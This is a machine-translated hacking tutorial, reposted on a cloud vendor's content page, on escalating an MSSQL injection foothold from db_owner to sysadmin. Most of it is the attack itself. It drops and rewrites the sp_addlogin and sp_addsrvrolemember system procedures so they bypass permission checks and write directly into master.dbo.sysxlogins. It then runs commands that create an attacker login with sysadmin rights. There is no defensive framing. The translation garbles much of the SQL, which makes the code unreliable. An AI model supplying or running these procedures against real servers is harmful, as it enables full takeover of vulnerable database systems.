MSSQL injection killer, as long as there are injection points, there is a system permission

Source: Internet
Author: User
I don't know if you have read this article. You can add the SysAdmin account under the db_owner role. This is really a tough move. The servers with the MSSQL injection vulnerability will suffer again. The primary method is to use db_owner to modify the sp_addlogin and SP_ADDSRVROLEMEMBER stored procedures, which is beyond the Verification Section. The specific method is as follows: first enter drop procedure sp_addlogin, then enter create procedure sp_addlogin in IE
@ Loginame sysname
, @ Passwd sysname = NULL
, @ Defdb; sysname = 'master' -- undone: Default

Retriable ???
, @ Deflanguage sysname = NULL
, @ Sid varbinary (16) = NULL
, @ Encryptopt varchar (20) = NULL
As
-- Setup runtime options/declare variables --
Set nocount on
Declare @ RET int -- Return Value of SP call

-- Disallow user transaction --
Set implicit_transactions off
If (@ trancount> 0)
Begin
Raiserror (15002,-1,-1, 'SP _ addlogin ')
Return (1)
End

-- Validate login name:
-- (1) valid SQL name (SQL login)
-- (2) No backslash (NT users only)
-- (3) Not a reserved Login Name
Execute @ ret = sp_validname @ loginame
If (@ RET <> 0)
Return (1)
If (charindex ('/', @ loginame)> 0)
Begin
Raiserror (15006,-1,-1, @ loginame)
Return (1)
End

-- Note: Different Case SA is allowed.
If (@ loginame = 'sa 'or lower (@ loginame) in ('public '))
Begin
Raiserror (15405,-1,-1, @ loginame)
Return (1)
End

-- Login name must not already exist --
If exists (select * from Master. DBO. syslogins where loginname =

@ Loginame)
Begin
Raiserror (15025,-1,-1, @ loginame)
Return (1)
End

-- Validate default database --
If db_id (@ defdb) is null
Begin
Raiserror (15010,-1,-1, @ defdb)
Return (1)
End

-- Validate default language --
If (@ deflanguage is not null)
Begin
Execute @ ret = sp_validlang @ deflanguage
If (@ RET <> 0)
Return (1)
End
Else
Begin
Select @ deflanguage = Name from Master. DBO. syslanguages
Where langid = @ default_langid -- Server default

Language

If @ deflanguage is null
Select @ deflanguage = n' us _ English'
End

-- Validate Sid if given --
If (@ Sid is not null) and (datalength (@ Sid) <> 16 ))
Begin
Raiserror (15419,-1,-1)
Return (1)
End
Else if @ Sid is null
Select @ SID = newid ()
If (suser_sname (@ Sid) is not null)
Begin
Raiserror (15433,-1,-1)
Return (1)
End

-- Validate and use encryption option --
Declare @ xstatus smallint
Select @ xstatus = 2 -- Access
If @ encryptopt is null
Select @ passwd = pwdencrypt (@ passwd)
Else if @ encryptopt = 'skip _ encryption_old'
Begin
Select @ xstatus = @ xstatus | 0x800, -- old-style

Encryption
@ Passwd = convert (sysname, convert (varbinary

(30), convert (varchar (30), @ passwd )))
End
Else if @ encryptopt <> 'skip _ encryption'
Begin
Raiserror (15600,-1,-1, 'SP _ addlogin ')
Return 1
End

-- Attempt the insert of the New login --
Insert into Master. DBO. sysxlogins values
(Null, @ Sid, @ xstatus, getdate (),
Getdate (), @ loginame, convert (varbinary (256), @ passwd ),
Db_id (@ defdb), @ deflanguage)
If @ error <> 0 -- This indicates we saw duplicate row
Return (1)

-- Update protection timestamp for Master dB, to indicate

Syslogins change --
Exec ('use master grant all to null ')

-- Finalization: Return success/failure --
Raiserror (15298,-1,-1)
Return (0) -- sp_addlogin

Go

OK. We have created a new user exec master .. sp_addlogin xwq.

Drop procedure SP_ADDSRVROLEMEMBER and enter

 

Create procedure SP_ADDSRVROLEMEMBER
@ Loginame sysname, -- Login Name
@ Rolename sysname = NULL -- server role name
As
-- Setup runtime options/declare variables --
Set nocount on
Declare @ RET int, -- Return Value of SP call
@ Rolebit smallint,
@ ISMEM int

-- Disallow user transaction --
Set implicit_transactions off
If (@ trancount> 0)
Begin
Raiserror (15002,-1,-1, 'SP _ addsrvrolemember ')
Return (1)
End


-- Cannot change SA roles --
If @ loginame = 'sa'
Begin
Raiserror (15405,-1,-1, @ loginame)
Return (1)
End

-- Obtain the bit for this role --
Select @ rolebit = case @ rolename
When 'sysadmin' then 16
When 'securityadmin' then 32
When 'serveradmin' then 64
When 'setupadmin' then 128
When 'processadmin' then 256
When 'diskadmin' then 512
When 'dbcreator' then 1024
When 'bulkadmin' then 4096
Else null end

-- Add row for NT login if needed --
If not exists (select * from Master. DBO. syslogins where

Loginname = @ loginame)
Begin
Execute @ ret = sp_msaddlogin_implicit_ntlogin @ loginame
If (@ RET <> 0)
Begin
Raiserror (15007,-1,-1, @ loginame)
Return (1)
End
End

-- Update role membership --
Update master. DBO. sysxlogins set xstatus = xstatus | @ rolebit,

Xdate2 = getdate ()
Where name = @ loginame and srvid is null

-- Update protection timestamp for Master dB, to indicate

Syslogins change --
Exec ('use master grant all to null ')

Raiserror (15488,-1,-1, @ loginame, @ rolename)

-- Finalization: Return success/failure
Return (@ error) -- SP_ADDSRVROLEMEMBER

Go

Then exec master... SP_ADDSRVROLEMEMBER xwq, SysAdmin
In this way, an SA user is created, and it is OK to connect with the SQL connector. Nice. However, when executing SQL commands using Nb in practice, an error will be prompted, probably because the code is too long and it is inconvenient to use IE, which of the following tools can be used to execute SQL statements for your convenience. OK. This is the end.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.